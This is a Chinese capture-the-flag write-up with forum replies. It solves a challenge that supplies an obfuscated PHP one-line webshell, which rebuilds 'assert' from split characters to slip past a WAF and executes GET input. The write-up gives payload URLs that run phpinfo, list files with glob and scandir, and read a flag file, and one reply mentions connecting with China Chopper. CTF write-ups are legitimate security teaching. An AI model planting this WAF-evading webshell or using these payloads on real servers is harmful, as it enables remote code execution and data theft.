“过狗一句话”解题思路

<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>


上来就给出了一句话   猜想是直接利用一句话   于是构造payload
http://120.24.86.145:8010/index.php?s=phpinfo();

发现成功执行。于是尝试能否执行cmd命令
http://120.24.86.145:8010/index.php?s=system('ls');
发现返回空白页面  没有任何信息说明执行失败，这里猜想是权限被控制了于是用另一种方法来读取文件
http://120.24.86.145:8010/index.php?s=print_r(glob('*.php'));  

发现只回显了一个index.php页面于是修改后缀
http://120.24.86.145:8010/index.php?s=print_r(glob('*.txt')); 发现有一个txt文件于是尝试读取

http://120.24.86.145:8010/index.php?s=show_source('ds231e.txt');
成功getflag
这里可以用其他方式读取 :
var_dump(file("./ds231e.txt"));
print_r(file("./ds231e.txt"));

注:glob() 函数返回匹配指定模式的文件名或目录。该函数返回一个包含有匹配文件 / 目录的数组。

scandir()也行

为表哥递茶

可以用菜刀连吗

大佬~ 我是getshell之后才找到的flag~

楼主的思路复杂了一点，我列目录用的是print_r(scandir(getcwd()))，直接把整个目录列了出来。后面txt文件的读取直接访问就可以了

给大佬倒水~~